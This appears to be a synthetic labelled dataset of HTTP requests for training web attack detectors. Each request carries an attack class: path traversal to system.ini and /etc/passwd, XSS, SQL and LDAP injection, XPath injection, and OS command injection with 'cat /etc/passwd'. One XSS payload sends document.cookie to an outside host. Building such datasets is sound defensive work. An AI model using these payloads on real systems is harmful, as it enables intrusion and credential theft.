Max-Forwards: 0822
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rPoaihzn"
Authorization: Digest opaque="acadbN"
Range: 210020-381691,-20380,4976-
Referer: http://fT8lra9i.be/nrdw/mleSo7co/srdyh/emdtdnnx.tiff
TE: deflate,deflate,chunked;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.0 (X11; U; Open BSD i386 8.0; sp-ii; rv:9.0.9) Gecko/96334707
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5283x402
Via: 7.6 www.jm2hErsu.jpg, HTTP/4.2 www.aged.png, 9.9 www.saos.css
Transfer-Encoding: identity
Upgrade: yhotE/7.5, Kihlr/2.4
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 036162640155
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43757
Start - Id: 45261
class: PathTransversal
GET ////? HTTP/1.0
Host: 136.43.113.136:80
Connection: rFer8tee
Accept: */*;q=0.3
Accept-Charset: iso-8859-15;q=0.1, x-mac-cyrillic, iso-8859-5;q=0.1, macintosh, x-mac-icelandic
Accept-Encoding: 
Accept-Language: th-oqmane;q=0.1
Cache-Control: min-fresh=44
Client-ip: 199.17.219.192
Cookie: ex=9lqeiwp-mNTi4Ho9;iikuqtfe=ntt;ksTb0ntgiw6=93208789
Cookie2: $Version="36"
Date: Thu, 23 Aug 07 19:39:45 CET
ETag: W/"ba2N-LW3dBH.hNtm3T"
Expect: 100-continue
From: geleR@t0uaaRegG.gov
If-Modified-Since: Sat, 31 Oct 09 09:10:58 GMT
If-Unmodified-Since: Thu, 25 Oct 07 22:02:20 UTC
If-Match: "uj_ovQk5au_1.EvgGTS"
If-None-Match: "rFUl3z-8CxDUOXS"
If-Range: Sun, 08 May 05 20:41:13 UTC
Max-Forwards: 39
MIME-Version: 1.7
Pragma: talghohn=geah
Proxy-Authorization: Digest qop=evai40
Authorization: Digest username="veno"
Range: -249,23568-43
Referer: /qtuyeeq4/oine0l/3rUt0fey/sonpidM/ibSLuu.tar.gz
TE: chunked
Trailer: Host
User-Agent: Mozilla/8.2 (X11; U; SunOS sun4u 8.5; ur-Ol; rv:7.5.3) Gecko/38685736
UA-CPU: 68000
UA-Disp: 783,7858,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: Ertrss/2.6 www.gthu.js:75962, 6.0 www.cdu2ird.shtml, HTTP/9.6 www.Ntt0teT.tiff
Transfer-Encoding: identity
Upgrade: t7aRna/4.0
Warning: 924 www.Tmlirlsa.shtml "t5eakntztrsthoinaeue" 
X-Forwarded-For: 95.222.138.243
X-Serial-Number: 67855229
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45261
Start - Id: 45096
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: 229.77.70.183
Connection: close
Accept: */*
Accept-Charset: windows-1251;q=0.3
Accept-Encoding: 
Accept-Language: cmendfe-t, 7wu9c-Itsn;q=0.3, sri-my3ob, tnk7oe-iuis
Cache-Control: no-store
Client-ip: 217.208.54.150
Cookie: 6fofT3ben=gqQo1;ea1smudacAs=rmOwTnha3dt 
Cookie2: $Version="8"
Date: Wed, 23 Feb 05 24:40:34 UTC
ETag: "NeIswK_7a5EBHO2LNI"
Expect: Snishje=s5Er;leRCEdsR
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Sun, 21 Dec 08 14:09:46 UTC
If-Unmodified-Since: Tue, 18 Mar 08 17:40:36 UTC
If-Match: "@qTsqfeb1mDFCco"
If-None-Match: "gAja489I21QsH_zgF6bm"
If-Range: Tue, 14 Oct 08 04:05:51 CET
Max-Forwards: 013
MIME-Version: 6.7
Pragma: ahla='llt'
Proxy-Authorization: Basic TnBudDpyclRlRWhl
Authorization: Basic T2UzdHNiZUw6ZXN2NnVT
Range: 61-,599945-,96-
Referer: /oniEvne/opha/lataeIu.dll
TE: gzip;q=0.6,trailers
Trailer: Connection
User-Agent: yetsrhicmrHodlei0cpr
UA-CPU: StrongARM
UA-Disp: 631,9480,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 4.6 www.h7weoi.jpg, 3.5 96.255.32.210, 0.6 198.75.80.163
Transfer-Encoding: gzip
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 211.43.232.104
X-Serial-Number: 888948293
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45096
Start - Id: 46728
class: XSS
GET /eiCI0kho1nnaOm0rxt/mNyttdmrrs0sne7d3ie/h5ste8ad/g_6oxU.nsf?b-Mk3Iscript=83165&oI2locationD-yT=execensbteiEjbio&2sock_streamCeL5=processing-instruction7%3E2-eghavinggtn%5BaaoM%2B&eh1ueeaOef=wone4neHBtteOl&nrubeinr1eHa=6a+RpsItS%24rhi+%26iniscript&sdookaewier=995558&catofd67i7dfmda=kgUt&yktlj=3varjr+u HTTP/1.1
Host: 115.155.133.4
Connection: keep-alive
Accept: application/*;q=0.8, application/*;q=0.0, image/*
Accept-Charset: *;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 90.199.103.247
Cookie: naZC9WTDw=<style    ><!--</style><script  >[alert ('o9gGog');]//--></script>;nei9olsrnusveb=gna
Cookie2: $Version="48"
Date: Mon, 21 Sep 09 05:19:44 GMT
ETag: "A8OQISp0bas4abp5"
From: ioseoBaR@sanfo.com
If-Modified-Since: Tue, 01 Feb 05 13:53:50 CET
If-Unmodified-Since: Mon, 19 May 08 16:59:32 CET
If-Match: "DY2HK11cu.e4qzvh5"
If-None-Match: "AxQ1sZn.QBlEsAbu"
If-Range: Sun, 06 Apr 08 08:15:08 CET
Max-Forwards: 6
Pragma: assa=rai
Authorization: fbhP earnnces=nhc5ste
Range: 490-,7202-
Referer: /p0H8eHu/7tIt5azR/anae/04on.msf
TE: chunked
User-Agent: aedaffebeh
Via: rutte/6.6 www.6mrn.htm, HTTP/1.0 www.0L1oi.shtml
Transfer-Encoding: rt3El
----: -------------------------------------------

null

End - Id: 46728
Start - Id: 36709
class: OsCommanding
POST /svi-D86YHgb4Puf.swf? HTTP/1.1
Content-Length: 273
Content-Language: eeesx5o6
Content-Encoding: identity
Content-Location: http://www.0etm.gov/Hciit/e8Eajr/hlrt/e1neCo.pdf
Content-MD5: dG5pcm1zcmFpc2xyZWdpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 May 05 02:24:07 UTC
Last-Modified: Fri, 15 Jul 05 18:01:56 GMT
Host: 110.127.51.199:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-cyrillic;q=0.9, utf-8, euc-tw;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 24.6.250.56
Cookie: Zlnetcatiz2.-UF=7031915994;ttteyoeu=07
Cookie2: $Version="7"
Date: Tue, 31 Oct 06 01:09:18 CET
ETag: W/"LE7CRa2rOJ_8Ht@xs8X"
Expect: ihu8
From: eralt@eApeeioers.de
If-Modified-Since: Wed, 22 Mar 06 15:48:47 UTC
If-Unmodified-Since: Tue, 15 Feb 05 21:05:21 UTC
If-Match: *
If-None-Match: "o1-oPsiDLjbd4.dJ5jbk"
If-Range: *
Max-Forwards: 6
MIME-Version: 4.5
Pragma: i3=lw1n
Proxy-Authorization: ssrr uentet=otetm
Authorization: Basic TmJzVGRzOmVrcW9weWU=
Range: 11-,-3
Referer: http://www.rvcnt.it/tmne/WeeDS/mg7ahe/d4er.mpg
TE: gzip,deflate,chunked
Trailer: Pragma
User-Agent: Mozilla/4.7 (Windows; U; Windows NT 1.9; dr-t2; rv:3.9.0) Gecko/98324310
UA-CPU: 68000
UA-Disp: 1584,454,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 654x545
Via: 2.8 www.yar0.shtml
Transfer-Encoding: gzip
Upgrade: omsr/2.0, rxspop/7.7, osEh/6.9
X-Forwarded-For: 3.19.153.226
X-Serial-Number: 56753790065108318
----: ---------------------------------

uUufdeoarr8=4478&tnlneLD=\n    uftp    -p www.tige.com   /ndniro/nsieitri/itla/as/ngdein/ta&sl=aEfOhhw1eo&R9abbiE6dlsee=do&ihe6=ise4ftpr&aas9ma4etl=uEmrtPeus&0ToncKE=bkof&le=9&nsSe=weseRemgttsi7ae&Wng5iormqht=zMUbvvY&s6ersycsnheale=n1vtX&saheyjHkbn=4932738046

End - Id: 36709
Start - Id: 49584
class: XPathInjection
GET /uelmiee3MipscAswsn7/oOcth74i/oihloQgyl.L6yZ.23Fk/JF/os.KiM_h786J.O/ewG4Yc9i2Hd_ux/e5yxvyT4/uy9vtxrL_scNp-5y/OHN/yjjr/ue.gif?oe=45&bH1unesqFemah=rutou%27+++or++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28+i+++%2B++j+++%2B++k+%2B+++l+++%2B1%29%5D++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++%27htn%27++++%3D+++%27+++aiMii%27+or&Nth8T=wL47&drhsuxnoemrO=7&ynty6A=d1X1T&nui5ippNce=uatl+ilcpnSs HTTP/1.1
Host: www.nmxdebthc.de:21616
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-1255;q=0.0, windows-874;q=0.6, iso-8859-8-i;q=0.7, x-mac-icelandic;q=0.1, isiri-3342
Accept-Encoding: *
Accept-Language: dcve9dys-h, fur-1bDwm
Cache-Control: min-fresh=4683
Client-ip: 217.150.196.230
Cookie: YiK4pQ=8;log9stylerservices5dxBu=i9iYOW
Cookie2: $Version="15"
Date: Fri, 18 Jul 08 22:45:42 UTC
ETag: W/"PmcmEKRs84Qlqdnx_"
Expect: zaa9l=tqnd;iaotty
From: vdtta@swAetit3jt.gov
If-Modified-Since: Fri, 20 Oct 06 16:10:16 GMT
If-Unmodified-Since: Wed, 06 Jul 05 07:56:11 UTC
If-Match: "L0Mw.7oWdTzNddcL3E"
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 2.3
Pragma: erst4wca=erhewkln
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: Basic dzljSGVpcTo3bHRl
Range: 124-314534,89-
Referer: /aenn8Al/Caouln/easrl.html
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.6 (X11; U; Open BSD i586 2.4; ld-1r; rv:1.2.0) Gecko/96791571
UA-CPU: PowerPC
UA-Disp: 427,3177,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 122x540
Via: legrxn/8.4 188.26.50.59
Transfer-Encoding: deflate
Upgrade: w3tun/4.7, nll2c/3.7, iotwG/2.5, ialro/2.8, zf5q/7.2
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49584
Start - Id: 46789
class: XSS
PUT /e90royezj/oXcir7/gfq81N8m/8ffd6uk2nY.f8ZLVM/eda537keseef/9.v79gk9K8XsJzricjv/ree0obAN/e3DY.H/iiJnprl9dahtsuyhUc66.js? HTTP/1.0
Content-Length: 347
Content-Language: dtkotno,ekupmett,cact
Content-Encoding: compress
Content-Location: /iadxnm/eapct4a/I5aro.cgi
Content-MD5: aGthVHVldDVsZHNvOGR0aA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Nov 04 21:03:05 GMT
Last-Modified: Fri, 12 Nov 04 12:19:06 GMT
Host: 190.207.237.176
Connection: keqEUg
Accept: */*
Accept-Charset: windows-1257;q=0.9, utf-8;q=0.3
Accept-Encoding: identity, deflate
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 160.46.236.124
Cookie: llincen=likeoa5z;tTedonPco=hinlhiqb4eeydg;eac=xttLteti;28selu9AttcLjt=142767511
Cookie2: $Version="93"
Date: Thu, 03 Aug 06 09:54:31 UTC
ETag: W/"9ru54XN6zAHoJv82D"
Expect: 100-continue
From: fnwte@lpuewgs.de
If-Modified-Since: Sat, 17 Jan 09 18:14:20 CET
If-Unmodified-Since: Mon, 31 Mar 08 23:58:29 GMT
If-Match: *
If-None-Match: "G0nTqeQa6KTAgBc.8"
If-Range: "oMiSPy4UkejBMD1Ydkw5"
Max-Forwards: 80
MIME-Version: 5.1
Pragma: iodee2i='5sh'
Proxy-Authorization: sdnda be5npAfd=Esnrrha
Authorization: Digest qop=auth
Range: 833-
Referer: http://www.olrE.st/sunnni/tttcrmr/uRAs.gz
TE: chunked;q=0.0
Trailer: If-None-Match
User-Agent: Mozilla/3.1 (X11; U; Open BSD i386 0.1; ir-AE; rv:8.3.7) Gecko/42925156
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: 4.2 95.239.189.82, eneyo/9.0 181.234.52.117
Transfer-Encoding: gzip
Upgrade: uugt9t/7.7, bihs/8.6, ei8Or/1.6, cnflaa/4.8, 1yu/6.0
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rOidwusshoy5g7=3421&duidEpnae5=nnSn&tems8iese=1&ttb=8103740140&ibmr2ecbtsvct= ~form5passthruxl&access_logvhT1hU=nofrbi&aFLbinusoN=febdfihc$ho&o4vsrg1oapn=4769&scf=sHerqXezEdE0nI&qlotgrnftEyuaz=<img dynsrc    =   "    javascript:  [alert('ethz');]  "  >&a41a8telcpeK=yyAKKJq7-jhk&eiaoidgdnt=lPzfIFxZ&irwenOiraEonIih=08

End - Id: 46789
Start - Id: 46535
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.0
Host: www.tyxeb.ch
Connection: keep-alive
Accept: audio/x-wav, text/*
Accept-Charset: macintosh, shift_jis;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 252.144.87.30
Cookie: 7Cphp4V59x=7omeld;stthdtortfnhq=1770798
Cookie2: $Version="896"
Date: Fri, 25 Jul 08 13:25:07 CET
ETag: "aNVJT2lKpqFCO9DMA"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 27 Nov 05 11:09:58 CET
If-Unmodified-Since: Wed, 24 May 06 17:59:03 UTC
If-Match: "9oYjg2GYAoSOmeeT-f"
If-None-Match: "yv_QRaX62.mvfbK"
If-Range: *
Max-Forwards: 2
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM YVNldHQ0aEVhZXduaDNDaWM5ZGdlOWNlU3BwZXBlcmFhcA==
Authorization: nr1ti raeureu=fttsc
Range: 545941-
Referer: http://www.lws3giil.de/le5rh/yneh6k.pl
TE: trailers
Trailer: If-None-Match
User-Agent: tfmyeiet/8.9.0.6
UA-CPU: x86
UA-Disp: 9426,1336,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 139x000
Via: FTP/4.1 www.usAoaoei.jpeg, 6.2 8.43.235.100:254
Transfer-Encoding: n9l6ro
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46535
Start - Id: 48253
class: XSS
POST /ha1tcuqp/jhNea7/lndwseiMC6d/ggHE.mdb? HTTP/1.1
Content-Length: 78
Content-Language: nogm37fp,bcessIyw,sqTzb
Content-Encoding: identity
Content-Location: /eviR/iao8fear/knk1.asmx
Content-MD5: a2FoYXdFdGlyNHRoVlJkcg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 06 Nov 08 14:49:43 CET
Last-Modified: Sun, 28 Jan 07 23:25:59 UTC
Host: www.aodmtnome.biz
Connection: keep-alive
Accept: application/zip, video/*;q=0.0, text/html;q=0.5
Accept-Charset: gb2312;q=0.9, x-mac-hebrew, x-mac-roman;q=0.9, cp-950
Accept-Encoding: gzip, gzip, deflate, gzip;q=0.8
Accept-Language: o-eo, afoute-a;q=0.3, eassauer-e;q=0.8
Cache-Control: only-if-cached
Client-ip: 189.109.70.184
Cookie: b3qi1M9af=eiap "         style=left:expression(alert   ("  ea.eEro   "))     alt    =  "
Cookie2: $Version="2"
Date: Sat, 30 Oct 04 13:26:27 UTC
ETag: "GyRoO6woP65L5RNAnX"
Expect: 100-continue
From: oslKrae@1ok4xdre.uk
If-Modified-Since: Mon, 11 Apr 05 17:18:56 GMT
If-Unmodified-Since: Thu, 25 Aug 05 19:51:08 GMT
If-Match: "m2xgQsH7FYCgbPmPEdb"
If-None-Match: "Xb6SCoEGsdpCE0Se26"
If-Range: Tue, 22 Feb 05 14:39:25 CET
Max-Forwards: 5365
MIME-Version: 3.0
Pragma: ttd0na='1st5s'
Proxy-Authorization: NTLM ZUllc2VkZWhiY2l3MG40c09IdGhhaGVzNnlIYW1pNm85cmRhaWtu
Authorization: pthi nnai4l=Honcoon
Range: 1099-42048,18-50962
Referer: /igwnd/wsiiyKy/bnaOaht5/gotaihZ/ene4a.php4
TE: trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.5 (compatible; Konqueror/8.2; Win98; titua)
UA-CPU: 68000
UA-Disp: 344,654,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9341x017
Via: 4.4 0.153.135.105, HTTP/0.2 178.10.248.172:61413
Transfer-Encoding: identity
Upgrade: nEev/1.1, U9Z7o/3.8
Warning: 342 173.97.45.171 "uivI8e2ePc" "Sat, 10 Mar 07 19:18:29 GMT"
X-Forwarded-For: 233.95.8.172
X-Serial-Number: 877369094
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NeeieAuepci=oIenieREKe&omonunB=499732478&Dz8E1ZY3-Pwhere=4&inabcfKtdw1=eIdumfn

End - Id: 48253
Start - Id: 47639
class: XSS
GET /srfethFeuata/iueght/gldwnID9-@/XuQVUWscriptiGX.cjtU/et73ThqYN221/rareioleIfHvcEepma/9Cyj/-qQK9VQa2@V/efrdysdresxujwrh/dW2-./tAnPeazw6echleagoir.htm?tiuady44fspt=%26%3Cscript+++%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.ieniti.com%2Fcgi-bin%2Fveilgeicnd.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E&nateh2ietrt=531457805&Tr=11299&Ltb=e5MC7NvDP HTTP/1.1
Host: 1.33.201.52:80
Connection: Loes
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Gghi-in, udmN-hrlEse9;q=0.6, d75br-oiDc;q=0.4
Cache-Control: max-stale
Client-ip: 113.72.70.216
Cookie: abumennhahueh3=ws8Holanfmafc9shme
Cookie2: $Version="84"
Date: Wed, 12 Aug 09 21:54:25 CET
ETag: W/"BIYFtHjXJp75ty5P"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Fri, 25 Sep 09 06:40:03 UTC
If-Unmodified-Since: Mon, 26 Jun 06 22:18:29 UTC
If-Match: "gjZ2BJIIgdFb-HuHC1f"
If-None-Match: *
If-Range: Fri, 05 Jan 07 06:32:39 GMT
Max-Forwards: 4403
MIME-Version: 4.2
Pragma: m=oihtnwl
Proxy-Authorization: Digest opaque="enht"
Authorization: Basic ZGlvZGR1cjpmUkl1bUE=
Range: 51-,059585-
Referer: http://en7t.biz/idK178yd.asmx
TE: trailers,deflate;q=0.3,trailers
Trailer: Accept-Encoding
User-Agent: aD4awQ2G http://www.teett.de
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3658x8516
Via: p3t/8.9 www.esne.png, 0.7 191.24.79.201, 1.3 200.85.64.252
Transfer-Encoding: gzip
Upgrade: 5dscf/6.1, eosne/4.5
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47639
Start - Id: 35366
class: SqlInjection
GET /dKp7Ggivo@mNGgC1Dc/oe8tdreistes/s5dosdIct/lpJ-OQk/NcisaquRjhlnyekcrd/si8EL..Zbi/d-uh9GqCFGm6XujC.dll?lootetaIpwoqxe=4rton&_Jm7=9_Z5jUItTXm&aNwfsma1yC=nPi1y&tvQnwVcftpB=gDMon2hfe&ihTftpied=oVr9dDAl6Z&k@@rBzDV=dtm4blemTf&bsAtn=ntfslb8sameuU&eserlv9ni2n2uis=71910717&aj1iehoh6=8323140&s9ne=2&eImhet5h2eht=or8passwd&zfnC0qnnIV6Fee=lJuwQykwoB4R&-c@OtADQbj5.=%27union+select++PASSWORD+from++++DBA_PASSWORD%3B--&atbi=375 HTTP/1.1
Host: 153.187.214.110
Connection: close
Accept: image/png;q=0.4, text/html, video/mpeg;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: identity, compress;q=0.9, compress;q=0.3, gzip
Accept-Language: lpvDcl0o-s;q=0.5
Cache-Control: max-stale=08828
Client-ip: 170.78.145.207
Cookie2: $Version="3"
Date: Mon, 25 May 09 03:39:12 CET
ETag: "hOfZpQKb4lvYuJI"
Expect: 06leorna
If-Unmodified-Since: Sun, 17 Jun 07 09:06:44 GMT
If-Match: "A_WZkwGMR@Gk.@a"
If-Range: *
Max-Forwards: 930
MIME-Version: 9.1
Pragma: no-cache
Authorization: N9er ltrrow=80sdtd
Range: 187-
Referer: /rEgaAsd/uesme.zip
TE: trailers,chunked;q=0.1,trailers
Trailer: Pragma
User-Agent: ewim (pb@qS-Az; nW5CDiZl4I)
UA-Pixels: 1597x768
Via: 9.1 159.185.158.102, 2.7 245.87.143.171:5
Transfer-Encoding: compress
Warning: 105 www.e4siinia.jpeg "yeoeae8edtaeehqtNems" 
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35366
Start - Id: 38866
class: LdapInjection
GET /ci9lirsCe06Eanderp9/AahB_/t8b.-oAVu/4_httpshomeprHEtqNoV/mFzDhsbL_Vo4/as5SaCKw@Tr7@mOE/siT5ctrfu7oto7swpsis/MU/obrJ5kBExOCeo6UEtaL0/xO0NbI.php3?Sp9Ctelnet=rrpf9&yqACgDshutdowngq=rnadtAkrEtlnlI0qh&csea=st&Ro2ae45mrarloOA=Sde9cnpdvar+o%40%5D%3Fr&0peo=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&udhga7tJjooyD=3923141 HTTP/1.0
Host: www.6zea2tieit.it
Connection: close
Accept: image/*;q=0.2, text/*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: pdeyr1f-nt;q=0.8, c-ntn0
Cache-Control: no-store
Client-ip: 214.111.130.134
Cookie: D72BBorNA=nlbtqeiatahrm;AV9qE=cet;orumttntrrhh7et=rxaRDz
Cookie2: $Version="90"
Date: Tue, 16 Nov 04 07:41:55 UTC
ETag: "PbMQvsd@O9GSQt4NCI2"
Expect: t02I
From: tdusret@b5koNnc.biz
If-Modified-Since: Sat, 17 Nov 07 16:01:50 CET
If-Unmodified-Since: Thu, 23 Sep 04 24:04:49 CET
If-Match: "9ClCAQo64_pt9PgpzV9"
If-None-Match: *
If-Range: Wed, 03 Sep 08 21:39:35 UTC
Max-Forwards: 6
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZXlkNnJpYTpxRm9tZ3c=
Authorization: NTLM cm9laHJyc21tNnMzdGZsYUhvbnA0b3RUaXVlaGxyamluaDJlbFM=
Range: 317-,-056
Referer: /Isinoti.asp
TE: trailers
Trailer: Via
User-Agent: eJkuSz7sP5 http://www.2iemhg0.org
UA-CPU: MIPS
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 279x383
Via: 9.0 www.lmte.css, FTP/1.4 www.rpeii.png
Transfer-Encoding: gzip
Upgrade: ie8dt4/3.8, nnn/9.0
Warning: 603 www.jhivN.jpg "Rsh3t7dghlournsj1" 
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 706863
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38866
Start - Id: 43223
class: OsCommanding
GET /hD_oINgVKkG4AiDW/uepsewhethn/Cthlnoa/a.hhbT/iatt/BSsrEdwtlmqku/bNv4l/sft1l1xu/feOensamyeeotoeeu9Q/e-Wf2_nCDWtIw013PvO/rolHY/eleu3oiknu.gif?Eptsrn1xhiMe=kMrr4t2eeahtu7&gr=Os&rdet=aoe&ctir6e=ts6d+&oSadurxsoen9etm=8552680049&bet=r&eye8igisn2bedn=38711&Iboot.ini36Uanodeuboot.ini=05578&s2nsen=DxkhmU&gnti=stH_jf&et=4ozfrAA%3By&tIwi=xnodeconnect&wn.xiB=%7C+cat+++++%2Fetc%2Fpasswd+++%7C&vUJNformwgetp79=mVmi96t HTTP/1.1
Host: www.Aedt.st:80
Connection: keep-alive
Accept: image/gif
Accept-Charset: iso-8859-15;q=0.6, utf-7;q=0.0, iso-10646-ucs-2;q=0.9, cp-932, x-mac-arabic
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 141.13.227.191
Cookie: 6hdrae7I=4036153164;vmtt=rhl8l';cwWnwbEg=3
Cookie2: $Version="4"
Date: Wed, 12 Aug 09 18:03:25 UTC
ETag: W/"V14zQu@WVcr.8maapJ9J"
Expect: 100-continue
From: Odth@g78cnm.uk
If-Modified-Since: Mon, 18 Apr 05 11:41:38 GMT
If-Unmodified-Since: Wed, 27 Jan 10 09:11:49 CET
If-Match: *
If-None-Match: *
If-Range: "v0xW65RH93jR4xe1.zPw"
Max-Forwards: 08
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="holleo"
Authorization: Pofq tqty7=7ebloswn
Range: 54119-349098
Referer: http://www.ramWS.fr/hNxolsHy/leEi/grr68tr/sgsmlrda/eae2tgA.swf
TE: trailers
Trailer: Referer
User-Agent: saue5yimee
UA-CPU: x86
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 476x125
Via: HTTP/0.8 7.114.147.168:60733
Transfer-Encoding: deflate
Upgrade: gSz/4.2, Gseoi/5.8, rch5/7.9, 6re6d/0.4
Warning: 633 195.113.214.10 "tse9mteOot6asnp" "Thu, 30 Jun 05 07:11:38 GMT"
X-Forwarded-For: 240.202.139.239
X-Serial-Number: 3512760212193
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43223
Start - Id: 46254
class: PathTransversal
GET /hemairmnndonta/yi0hrE6DM_h85Oq2Q-NA/rx-fqCITE-n/n8dee/g8wVNf.kw79vh2/hcldIoTrimh/UnbyexasntAirhGro/lfhecsfyud/r9.msf?0y81UE_Z@4=o_HmIy&.W0sperl@9Mk6R.=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&ZN6M9selectSZJ60=%7E&fzbit7izeski5ed=aerm&nr=sNlHb5F.&zue8=415&tjajs6ehil5Qe=iA7rtallet-ct0htpass8winnt&tdnAlyoeavo6maa=1k8TBvZQHf&nr1ll2i4es=+he&x1vbrKwerlez9=50 HTTP/1.1
Host: www.Svnhtosthl.st:80
Connection: aesths
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 190.79.101.95
Cookie: roe4=7<
Cookie2: $Version="7"
Date: Fri, 06 Oct 06 17:02:20 GMT
ETag: "_9L1EBmUlyekels"
Expect: 100-continue
From: iervv@usohuics.gov
If-Modified-Since: Mon, 08 Nov 04 06:46:28 UTC
If-Unmodified-Since: Sun, 13 May 07 06:33:10 UTC
If-Match: "s1p9H9J23l_tY4APM"
If-None-Match: "TmJzYa_H_h2GU@POd"
If-Range: Sun, 22 Jul 07 03:13:40 GMT
Max-Forwards: 389
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://a8bl.ch/noetzkll/itbnanre/awsc.jsp
Authorization: NTLM bGFhaHRob3V0bWUxZWV0YXd0eW5tZmFpeWFzemFkbmNzZWFlU282dWlwZWU=
Range: 5263-
Referer: http://OeeDt.uk/grqc/ipul8ee/e0el/u8qhear.asmx
TE: trailers,chunked;q=0.2
Trailer: If-Modified-Since
User-Agent: jeenqreRhbUiecshuga
UA-CPU: 68000
UA-Disp: 5467,9007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: crh/0.1 www.Ieysnc.shtml, FTP/1.3 104.178.50.100:477, HTTP/8.2 47.145.216.109
